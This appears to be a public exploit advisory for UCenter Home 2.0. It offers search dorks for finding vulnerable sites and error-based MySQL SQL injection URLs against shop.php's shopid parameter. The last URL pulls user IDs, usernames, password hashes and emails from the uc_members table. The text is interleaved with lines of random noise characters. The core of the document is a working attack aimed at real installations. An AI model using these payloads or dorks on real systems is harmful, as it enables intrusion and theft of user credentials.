$ _5 e! Y2 G, o3 C* e__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ * Q: v h) I+ \' p
) M. H5 o- ~3 D1 f( X3 g% Y( ^! R. \ N
0 I- Z3 C& h- w; U: I+ J5 n q
% [6 E- a6 ?, S) g+ b. l7 n*/ Author : KnocKout ; n+ c% \( ~) K7 P& H* K5 k
1 A+ [. {) }' A8 _! C
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ; B; d6 w/ r7 Q2 D# {- }" Y
( {3 ]% h8 A" O) m& D3 _% r
*/ Contact: knockoutr@msn.com
" S- s5 ~' @- j- h( f3 L% k, U9 w1 ?9 v4 P, j3 c
*/ Cyber-Warrior.org/CWKnocKout
4 H7 z/ P7 ^, W( _# ^# n$ |
% x' a, U j( {; o! m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / m( a; b( b2 a1 @" H
) O/ s( r7 J0 S3 rScript : UCenter Home + }" A, ~" C' _: z
0 I. a0 b! e5 d( u
Version : 2.0
L6 q2 [9 z" O4 \% o
4 _9 |8 K- o+ }+ vScript HomePage : http://u.discuz.net/ 4 _4 B1 c, n9 e9 [- u. g* u
) S3 S' J! @& |, p0 n: u
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # d5 \. K4 D, j8 J/ Y
; ?- U+ _4 L( j6 q8 RDork : Powered by UCenter inurl:shop.php?ac=view , m. n: O2 S% V5 ]# h k
6 o' R7 p; c& H- M; |/ g
Dork 2 : inurl:shop.php?ac=view&shopid= 2 }4 Y! f6 `% y- l% \# a/ G1 f3 ~
5 W* I; R; O% s# K# k; d4 B__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" M) N, w* ^' z* W4 L5 Y* `4 `
$ K2 D2 W; I, R, fVuln file : Shop.php
4 G& t. a2 H: z- q- j3 S1 t& T) T; {
value's : (?)ac=view&shopid= 8 d5 ^ c! A! r7 Y ?5 M: Y3 m
/ E! ~" P# A' Q* a
Vulnerable Style : SQL Injection (MySQL Error Based) ) z+ C7 B1 _% J& e
) q- b( K7 r9 v! v) k) u" H6 [; U
Need Metarials : Hex Conversion
/ |& Y' I% V6 ~7 t1 M' j" K: a% @% @, ?0 j, k0 o* g$ s. C/ h5 i- Q. e8 k; b
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; k" l6 N4 \& x4 G6 G' g" z
3 B$ b) o9 r% R+ f7 Q+ H7 L+ nYour Need victim Database name.
& P. H7 e/ z3 t# z5 R- E$ b* r" T
! a3 y3 }: y f7 @( vfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
" G5 _! T# O0 H( V6 E5 ~) r9 ?; c3 C
..
5 c) ]" x* k. k( e' J% \0 c6 H2 [( r, V9 ]' Z6 U1 Z
DB : Okey.
% M b! h* {3 P7 L3 e: U4 a8 _' \! \! Y2 ^
your edit DB `[TARGET DB NAME]`
m7 u" E9 ]" T, H' Z7 H9 A5 E. j( z- Q- r8 L& {
Example : 'hiwir1_ucenter'
) F' @7 q, H5 Q t9 J8 D5 j$ [' |' i# D) {1 E% f8 L
Edit : Okey.
" V4 \6 {- ~# ]
, s- U/ |- W. q4 a3 a; [Your use Hex conversion. And edit Your SQL Injection Exploit..
9 R! g( m8 p. Z! y( @5 g& h6 m, O5 e
9 q; d( U9 V+ F# D2 W 5 a9 i$ i/ p! g, u- R* b) s4 b
7 N" p `6 D; g6 e
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 % [( L. |& g& p
|